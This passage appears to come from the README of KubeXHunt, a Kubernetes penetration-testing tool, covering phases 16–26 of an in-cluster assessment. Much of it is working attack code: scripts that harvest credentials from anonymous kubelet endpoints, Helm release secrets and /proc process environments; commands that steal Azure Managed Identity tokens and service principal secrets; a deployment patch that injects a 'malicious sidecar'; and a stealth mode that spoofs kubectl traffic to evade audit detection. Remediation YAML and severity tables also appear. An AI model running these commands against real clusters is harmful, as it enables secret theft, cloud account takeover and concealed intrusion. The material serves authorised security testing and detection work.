        print(f'πŸ”΄ {meta[\"namespace\"]}/{meta[\"name\"]}: {issues}')
"

🎯 Phase 16: Kubelet Exploitation ⭐

16.1 Anonymous Kubelet Access

πŸ”΄ CRITICAL β€” full pod list, env vars, exec capability without credentials

# Port 10255 β€” read-only, no auth
for NODE_IP in $(curl -sk -H "Authorization: Bearer $TOKEN" $API/api/v1/nodes | \
  python3 -c "import sys,json; [print(a['address']) for n in json.load(sys.stdin).get('items',[]) for a in n.get('status',{}).get('addresses',[]) if a['type']=='InternalIP']" 2>/dev/null); do

  echo "━━━ Kubelet @ $NODE_IP ━━━"
  curl -s --max-time 5 http://$NODE_IP:10255/pods 2>/dev/null | \
    python3 -c "import sys,json; d=json.load(sys.stdin); print(f'πŸ”΄ 10255 ANONYMOUS β€” {len(d.get(\"items\",[]))} pods')" \
    2>/dev/null || echo "βœ… 10255 not accessible"

  curl -sk --max-time 5 https://$NODE_IP:10250/pods 2>/dev/null | head -1 | \
    grep -q "items" && echo "πŸ”΄ 10250 ANONYMOUS ACCESS" || echo "βœ… 10250 requires auth"
done

16.2 Harvest Credentials from Kubelet /pods

# Extract all env var credentials from every pod on the node
curl -s http://$NODE_IP:10255/pods 2>/dev/null | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
cred_kw = ['password','secret','token','api_key','credential']
for pod in d.get('items', [])[:20]:
    for c in pod.get('spec', {}).get('containers', []):
        for env in c.get('env', []):
            if any(kw in env.get('name', '').lower() for kw in cred_kw):
                print(f'πŸ”΄ {pod[\"metadata\"][\"name\"]}/{c[\"name\"]}: {env[\"name\"]}={str(env.get(\"value\",\"\"))[:60]}')
"

πŸ—„οΈ Phase 17: etcd Exposure ⭐

# Probe each node IP
for NODE_IP in $NODE_IPS; do
  # No TLS
  curl -s --max-time 4 http://$NODE_IP:2379/version 2>/dev/null | grep -q "etcdserver" && \
    echo "πŸ”΄ ETCD NO-TLS at $NODE_IP:2379 β€” DUMP ALL SECRETS" || true

  # HTTPS without client cert
  curl -sk --max-time 4 https://$NODE_IP:2379/version 2>/dev/null | grep -q "etcdserver" && \
    echo "πŸ”΄ ETCD HTTPS NO CLIENT CERT at $NODE_IP:2379" || \
    echo "βœ… etcd protected at $NODE_IP"
done

β›΅ Phase 18: Helm & Application Secrets ⭐

# Find and decode Helm release secrets (base64 + gzip)
curl -sk -H "Authorization: Bearer $TOKEN" $API/api/v1/secrets | \
  python3 -c "
import sys, json, base64, gzip, re
d = json.load(sys.stdin)
cred_pat = re.compile(r'(?:password|secret|token|apikey)\s*[:=]\s*[\"\']?([^\s\"\'<>]{6,})', re.I)
for s in d.get('items', []):
    if s.get('type') == 'helm.sh/release.v1':
        raw = s.get('data', {}).get('release', '')
        if raw:
            try:
                raw2 = base64.b64decode(base64.b64decode(raw))
                content = gzip.decompress(raw2).decode(errors='replace')
                matches = cred_pat.findall(content)
                if matches:
                    print(f'πŸ”΄ Credentials in Helm release {s[\"metadata\"][\"name\"]}: {matches[:3]}')
            except Exception as e:
                pass
"

πŸ” Phase 19: /proc Credential Harvesting ⭐

# Two-phase scan: pod co-processes first, then host processes via hostPID
# Uses cgroup comparison to distinguish pod PIDs from host PIDs β€” prevents
# the same credential appearing twice when hostPID is enabled
python3 -c "
import os
cred_kw = ['password','secret','token','api_key','redis','database_url']
skip_kw = ['kubernetes','service_port','service_host','path','home','shell','term']

# Get our cgroup to identify the pod boundary
our_cgroup = open('/proc/self/cgroup').read().split('\n')[0].split(':')[-1]
our_pid    = str(os.getpid())
pod_pids   = {our_pid}

print('=== Pod Co-Processes ===')
for pid in os.listdir('/proc'):
    if not pid.isdigit() or pid == our_pid: continue
    try:
        pid_cg = open(f'/proc/{pid}/cgroup').read().split('\n')[0].split(':')[-1]
        comm   = open(f'/proc/{pid}/comm').read().strip()
        if pid_cg == our_cgroup:          # same cgroup = same pod
            pod_pids.add(pid)
            for ev in open(f'/proc/{pid}/environ').read().split('\x00'):
                if '=' in ev:
                    k, _, v = ev.partition('=')
                    kl = k.lower()
                    if any(kw in kl for kw in cred_kw) and not any(sk in kl for sk in skip_kw) and v:
                        print(f'πŸ”΄ PID {pid} ({comm}): {k}={v[:60]}')
    except Exception: pass

# Host processes β€” only if hostPID is enabled (PID 1 = systemd/init)
pid1 = open('/proc/1/comm').read().strip()
if pid1 in ('systemd','init'):
    print('\n=== Host Processes (hostPID) ===')
    host_kw = ['kube','etcd','containerd','docker']
    for pid in os.listdir('/proc'):
        if not pid.isdigit() or pid in pod_pids: continue  # skip pod's own PIDs
        try:
            comm    = open(f'/proc/{pid}/comm').read().strip()
            cmdline = open(f'/proc/{pid}/cmdline').read().replace('\x00',' ')
            if any(kw in comm.lower() or kw in cmdline.lower() for kw in host_kw):
                print(f'Host process: PID {pid} ({comm})')
                for ev in open(f'/proc/{pid}/environ').read().split('\x00'):
                    if '=' in ev:
                        k, _, v = ev.partition('=')
                        kl = k.lower()
                        if any(kw in kl for kw in cred_kw) and not any(sk in kl for sk in skip_kw) and v:
                            print(f'  πŸ”΄ {k}={v[:60]}')
        except Exception: pass
"
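A note on the parsing above: `/proc/<pid>/environ` and `/proc/<pid>/cmdline` are NUL-delimited, not newline-delimited. A self-contained illustration of the split logic:

```python
# /proc/<pid>/environ stores variables as NUL-separated KEY=VALUE pairs.
# Minimal standalone illustration of the Phase 19 parsing logic.
raw = b'PATH=/usr/bin\x00DB_PASSWORD=s3cret\x00HOME=/root\x00'

cred_kw = ['password', 'secret', 'token']
found = {}
for entry in raw.decode(errors='replace').split('\x00'):
    if '=' in entry:
        k, _, v = entry.partition('=')
        if any(kw in k.lower() for kw in cred_kw) and v:
            found[k] = v

print(found)  # β†’ {'DB_PASSWORD': 's3cret'}
```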

☁️ Phase 20: Azure AKS ⭐

# Azure IMDS
curl -s -H "Metadata: true" \
  "http://169.254.169.254/metadata/instance?api-version=2021-02-01" 2>/dev/null | python3 -m json.tool

# Managed Identity token theft
for resource in "https://management.azure.com/" "https://storage.azure.com/" "https://vault.azure.net/"; do
  curl -s -H "Metadata: true" \
    "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=$resource" \
    2>/dev/null | python3 -c "
import sys, json
d = json.load(sys.stdin)
if 'access_token' in d:
    print(f'πŸ”΄ Managed Identity token for $resource β€” type: {d.get(\"token_type\")} | expires: {d.get(\"expires_in\")}s')
" 2>/dev/null
done

# Service Principal credentials
cat /etc/kubernetes/azure.json 2>/dev/null | python3 -c "
import sys, json
d = json.load(sys.stdin)
secret = d.get('aadClientSecret','') or d.get('clientSecret','')
if secret:
    print(f'πŸ”΄ SP Credentials: clientId={d.get(\"aadClientId\",\"\")} secret={secret[:8]}...')
" 2>/dev/null

πŸ”§ Phase 21: OpenShift / OKD ⭐

# SCC enumeration
curl -sk -H "Authorization: Bearer $TOKEN" \
  $API/apis/security.openshift.io/v1/securitycontextconstraints | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
dangerous = ['anyuid','privileged','hostmount-anyuid','hostaccess']
for s in d.get('items', []):
    name = s['metadata']['name']
    icon = 'πŸ”΄' if name in dangerous else 'πŸ”΅'
    print(f'{icon} SCC: {name}')
" 2>/dev/null

# OpenShift Routes
curl -sk -H "Authorization: Bearer $TOKEN" \
  $API/apis/route.openshift.io/v1/routes | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
for r in d.get('items', []):
    host = r.get('spec',{}).get('host','')
    print(f'  β†’ {host}')
" 2>/dev/null

βš” Phase 22: Advanced Red Team Techniques ⭐

22.1 SA Token Audience Abuse

# Decode current token β€” check audience claim
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
python3 -c "
import base64, json, sys
parts = '$TOKEN'.split('.')
if len(parts) >= 2:
    payload = json.loads(base64.urlsafe_b64decode(parts[1] + '=='))
    aud = payload.get('aud', [])
    iss = payload.get('iss', '')
    exp = payload.get('exp', 0)
    print(f'aud: {aud}')
    print(f'iss: {iss}')
    print('πŸ”΄ No audience β†’ token replay risk' if not aud else 'βœ… Audience scoped')
"
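The `+ '=='` above compensates for the base64url padding that JWTs strip; Python's decoder tolerates surplus trailing padding, so blindly appending two `=` is safe for any payload length. A standalone sketch against a synthetic token (illustrative only, not a real service account token):

```python
import base64, json

def jwt_payload(token: str) -> dict:
    """Decode a JWT payload without verifying the signature.
    Appending '==' tolerates stripped base64url padding."""
    parts = token.split('.')
    return json.loads(base64.urlsafe_b64decode(parts[1] + '=='))

# Synthetic header.payload.signature token, built for illustration only
header  = base64.urlsafe_b64encode(b'{"alg":"none"}').rstrip(b'=').decode()
payload = base64.urlsafe_b64encode(
    json.dumps({'iss': 'kubernetes/serviceaccount', 'aud': []}).encode()
).rstrip(b'=').decode()
fake = f'{header}.{payload}.sig'

claims = jwt_payload(fake)
print('token replay risk' if not claims.get('aud') else 'audience scoped')
# β†’ token replay risk
```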

22.2 Controller Hijacking (Sidecar Injection)

# Patch existing deployment to inject malicious sidecar
curl -sk -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json-patch+json" -X PATCH \
  $API/apis/apps/v1/namespaces/$NS/deployments/<DEPLOYMENT-NAME> \
  -d '[{
    "op": "add",
    "path": "/spec/template/spec/containers/-",
    "value": {
      "name": "assessment-sidecar",
      "image": "alpine",
      "command": ["sleep","3600"]
    }
  }]' | python3 -m json.tool

πŸ”— Phase 23: Real-World Attack Chain Simulation ⭐

KubeXHunt automatically validates all four chains based on findings from previous phases.

| Chain | CRITICAL if... |
|---|---|
| Pod β†’ IMDS β†’ Cloud Account | SA token present AND cloud IMDS reachable |
| RBAC β†’ Privileged Pod β†’ Node Root | Can list secrets AND can create privileged pods |
| Token Theft β†’ Wildcard RBAC β†’ Cluster Admin | Stolen tokens found AND one has wildcard RBAC |
| Webhook Bypass β†’ Node Escape | failurePolicy=Ignore AND webhook service unreachable |
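The chain validation boils down to a conjunction over earlier findings. A minimal sketch of that logic, using hypothetical finding keys (KubeXHunt's internal model may differ):

```python
# Hypothetical findings dict populated by earlier phases; key names are
# illustrative, not KubeXHunt's actual schema.
findings = {
    'sa_token_present': True,
    'imds_reachable': True,
    'can_list_secrets': False,
    'can_create_privileged_pods': True,
}

CHAINS = {
    'Pod -> IMDS -> Cloud Account': ['sa_token_present', 'imds_reachable'],
    'RBAC -> Privileged Pod -> Node Root': ['can_list_secrets',
                                            'can_create_privileged_pods'],
}

# A chain is CRITICAL only when every prerequisite finding is confirmed.
critical = [name for name, reqs in CHAINS.items()
            if all(findings.get(r, False) for r in reqs)]
print(critical)  # β†’ ['Pod -> IMDS -> Cloud Account']
```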

πŸ•΅οΈ Phase 24: Stealth & Evasion Analysis ⭐

# Run with maximum stealth β€” blends into normal kubectl traffic
python3 kubexhunt.py --stealth 2 --no-mutate

# What stealth level 2 does:
# - User-Agent: kubectl/v1.29.0 (linux/amd64) kubernetes/v1.29.0
# - Timing jitter: 0.5–3.5s between API calls
# - Read-only: all capabilities inferred from RBAC, no test resources created
# - Batched: parallel checks minimized
# - Result: zero mutating audit log entries, traffic looks like normal kubectl usage

# Verify --no-mutate produces PASS (not HIGH) for the mutating API calls finding
python3 kubexhunt.py --no-mutate --phase 24 --no-color 2>/dev/null | grep -A2 "Mutating API"
# Expected: βœ… PASS  Mutating API calls skipped (--no-mutate active)
#           Zero write operations in audit log

# Verify stealth level is reflected correctly
python3 kubexhunt.py --stealth 1 --phase 24 --no-color 2>/dev/null | grep -A2 "Stealth"
# Expected: βœ… PASS  Stealth level 1 active
#           kubectl User-Agent spoofing | Timing jitter (0.3–2s)
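The behaviors above reduce to a spoofed client string plus randomized delays between API calls. A minimal sketch; `stealth_request` and the jitter mapping are illustrative, taken from the documented ranges rather than the tool's source:

```python
import random, time, urllib.request

# Jitter ranges per stealth level, mirroring the documented behavior
# (illustrative mapping, not KubeXHunt's internals).
JITTER = {1: (0.3, 2.0), 2: (0.5, 3.5)}
KUBECTL_UA = 'kubectl/v1.29.0 (linux/amd64) kubernetes/v1.29.0'

def stealth_request(url: str, token: str, level: int = 2) -> urllib.request.Request:
    lo, hi = JITTER[level]
    time.sleep(random.uniform(lo, hi))   # blend into normal traffic timing
    return urllib.request.Request(url, headers={
        'Authorization': f'Bearer {token}',
        'User-Agent': KUBECTL_UA,        # mimic the kubectl client string
    })
```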

🌐 Phase 25: Network Plugin & Misc ⭐

# Detect CNI
for cni_path in /etc/cni/net.d/10-calico.conflist /etc/cni/net.d/05-cilium.conf \
                /etc/cni/net.d/10-weave.conf /etc/cni/net.d/10-flannel.conf; do
  [ -f "$cni_path" ] && echo "CNI: $(basename $cni_path | sed 's/[0-9]*-//;s/\..*$//')"
done

# Cluster-wide automount audit
curl -sk -H "Authorization: Bearer $TOKEN" $API/api/v1/pods | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
over_mounted = [f'{p[\"metadata\"][\"namespace\"]}/{p[\"metadata\"][\"name\"]}' for p in d.get('items',[])
                if p.get('spec',{}).get('automountServiceAccountToken') is not False]
print(f'🟑 {len(over_mounted)} pods auto-mount SA tokens (set automountServiceAccountToken: false explicitly)')
"
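Remediation for the over-mounted pods is to set the flag explicitly; the pod-level setting takes precedence over the ServiceAccount default:

```yaml
# ServiceAccount-level default: no automatic token mount
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-sa
automountServiceAccountToken: false
---
# Pod-level setting (overrides the ServiceAccount default)
apiVersion: v1
kind: Pod
metadata:
  name: app
spec:
  serviceAccountName: app-sa
  automountServiceAccountToken: false
  containers:
  - name: app
    image: alpine
```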

πŸ”„ Phase 26: Diff & CI/CD Reporting ⭐

# Generate baseline
python3 kubexhunt.py --output baseline.json

# After infrastructure change β€” compare
python3 kubexhunt.py --diff baseline.json --output rescan.json
# Exits code 1 if new CRITICAL or HIGH found

# In CI/CD pipeline (GitLab/GitHub Actions example)
python3 kubexhunt.py \
  --stealth 2 \
  --no-mutate \
  --diff previous-scan.json \
  --output "$CI_JOB_NAME-$(date +%Y%m%d).json" || exit 1
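The diff gate can be sketched as a set comparison over finding IDs, failing only on newly introduced CRITICAL or HIGH results. The JSON shape below is hypothetical; the tool's actual report schema may differ:

```python
# Hypothetical report shape: a list of {'id': ..., 'severity': ...} findings.
baseline = [{'id': 'imds-reachable', 'severity': 'CRITICAL'}]
rescan   = [{'id': 'imds-reachable', 'severity': 'CRITICAL'},
            {'id': 'wildcard-rbac',  'severity': 'HIGH'}]

def new_blockers(old, new):
    """Findings present in the new scan but not the baseline, at blocking severity."""
    seen = {f['id'] for f in old}
    return [f for f in new
            if f['id'] not in seen and f['severity'] in ('CRITICAL', 'HIGH')]

blockers = new_blockers(baseline, rescan)
print([f['id'] for f in blockers])  # β†’ ['wildcard-rbac']
# In CI: exit nonzero when blockers is non-empty to fail the pipeline
```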

πŸ“ Findings Summary Template

## Finding: [Title]

**Severity:** πŸ”΄ Critical / 🟠 High / 🟑 Medium / πŸ”΅ Low
**Category:** Cloud Credentials | RBAC | Container Escape | Lateral Movement | Runtime | Supply Chain

**Evidence:**
```
<paste command output here>
```

**Impact:**
<What can an attacker achieve with this finding>

**Steps to Reproduce:**
1. Starting from compromised pod in namespace `<ns>`
2. Run: `<command>`
3. Observe: `<output>`

**Remediation:**
- [ ] <specific fix>
- [ ] <specific fix>

**References:**
- MITRE ATT&CK: [T1552.007](https://attack.mitre.org/techniques/T1552/007/) Container Credentials

πŸ“Š Severity Matrix

| Finding | Severity | Immediate Impact |
|---|---|---|
| IMDS accessible + IAM credentials stolen | πŸ”΄ Critical | AWS/GCP/Azure account takeover |
| etcd accessible without auth | πŸ”΄ Critical | All cluster secrets in plaintext |
| Privileged pod + hostPath mount | πŸ”΄ Critical | Full node + cluster compromise |
| aws-auth / ClusterRoleBinding writable | πŸ”΄ Critical | Permanent cluster-admin |
| Kubelet 10255/10250 anonymous access | πŸ”΄ Critical | All pod credentials harvested |
| Attack chain simulation β€” any complete chain | πŸ”΄ Critical | End-to-end cluster or cloud compromise |
| API server on public IP | πŸ”΄ Critical | Internet-exposed K8s API β€” brute-force / CVE exploitation risk |
| Wildcard RBAC on service account | 🟠 High | All secrets in cluster readable |
| Other pods' SA tokens readable via hostPath | 🟠 High | Lateral movement to any workload |
| Kubelet certificate accessible | 🟠 High | system:node credential |
| Helm release secrets with embedded credentials | 🟠 High | Application credentials exposed |
| Unsigned images allowed in admission | 🟠 High | Supply chain backdoor vector |
| failurePolicy: Ignore on Kyverno webhook | 🟠 High | All admission policies bypassable |
| Azure Managed Identity / SP credentials | 🟠 High | Azure subscription access |
| OpenShift anyuid/privileged SCC | 🟠 High | Container escape equivalent |
| Worker nodes with public IPs | 🟠 High | Kubelet 10250 / NodePort services exposed to internet |
| Registry credential catalog pivot | 🟠 High | Pull/push private images β€” supply chain backdoor possible |
| No mTLS between services | 🟑 Medium | Traffic sniffing, PII exposure |
| No Tetragon/Falco runtime security | 🟑 Medium | Reverse shells, crypto mining go undetected |
| Flat network (no NetworkPolicy) | 🟑 Medium | Unrestricted lateral movement |
| PSS not enforced on namespace | 🟑 Medium | Container escape vector open |
| Cluster-wide automountServiceAccountToken | 🟑 Medium | Every pod a K8s API auth point |
| Missing resource limits | πŸ”΅ Low | Node DoS / noisy neighbour |
| No audit logging | πŸ”΅ Low | No forensic trail for incidents |

☁️ EKS vs GKE vs Azure vs OpenShift

| Check | EKS | GKE | Azure AKS | OpenShift |
|---|---|---|---|---|
| Metadata endpoint | 169.254.169.254 | metadata.google.internal | 169.254.169.254 | N/A |
| Node IAM | EC2 instance role | GCE service account | Managed Identity / SP | N/A |
| K8s auth mapping | aws-auth ConfigMap | GKE IAM β†’ K8s RBAC | AAD β†’ K8s RBAC | OAuth + SCC |
| Pod-level cloud auth | IRSA | Workload Identity | Workload Identity / AAD Pod Identity | N/A |
| Audit logs | CloudWatch | Cloud Logging | Azure Monitor | OpenShift Audit |
| Default CNI | Amazon VPC CNI | Cilium | Azure CNI | OVN-Kubernetes |
| Container policy | PSS + Kyverno | PSS + Binary Auth | PSS + Azure Policy | SCC (SecurityContextConstraints) |
| etcd access | Fully managed | Fully managed | Fully managed | Managed (self-hosted possible) |
| Legacy metadata | IMDSv1 (disable explicitly) | v1beta1 (off since GKE 1.21) | β€” | N/A |
| Unique attack surface | aws-auth write | cloud-platform scope | azure.json / SP creds | anyuid SCC assignment |
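The metadata-endpoint row drives cloud detection. A minimal probing sketch; note that AWS and Azure share 169.254.169.254, so the distinguishing factors are the path and the required header (GCP requires `Metadata-Flavor: Google`, Azure requires `Metadata: true`):

```python
# Provider-specific metadata probes: (URL, required headers) pairs,
# matching the "Metadata endpoint" row above.
PROBES = {
    'aws':   ('http://169.254.169.254/latest/meta-data/', {}),
    'gcp':   ('http://metadata.google.internal/computeMetadata/v1/',
              {'Metadata-Flavor': 'Google'}),
    'azure': ('http://169.254.169.254/metadata/instance?api-version=2021-02-01',
              {'Metadata': 'true'}),
}

def detect(fetch):
    """Return the first provider whose metadata endpoint answers.
    fetch(url, headers) is injected so the probe order stays testable."""
    for provider, (url, headers) in PROBES.items():
        try:
            if fetch(url, headers):
                return provider
        except Exception:
            pass  # unreachable endpoint or wrong provider: try the next probe
    return None
```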

🎯 Use Cases

  • πŸ”΄ Red Team / Pentesting
    Simulate real attacker behavior inside compromised pods

  • πŸ”΅ Blue Team / Detection Engineering
    Validate detection coverage and audit logging

  • 🟒 DevSecOps / Platform Teams
    Identify real-world impact of misconfigurations

  • 🟣 CI/CD Security Gates
    Fail builds on newly introduced critical risks


All test cases require written authorisation before execution. Document every command run, every output captured, and all cleanup actions taken.


About

KubeXHunt is a Kubernetes security assessment tool designed for penetration testers and security engineers to evaluate cluster misconfigurations and potential attack paths from within a compromised pod, providing clear pass/fail results for each security check.
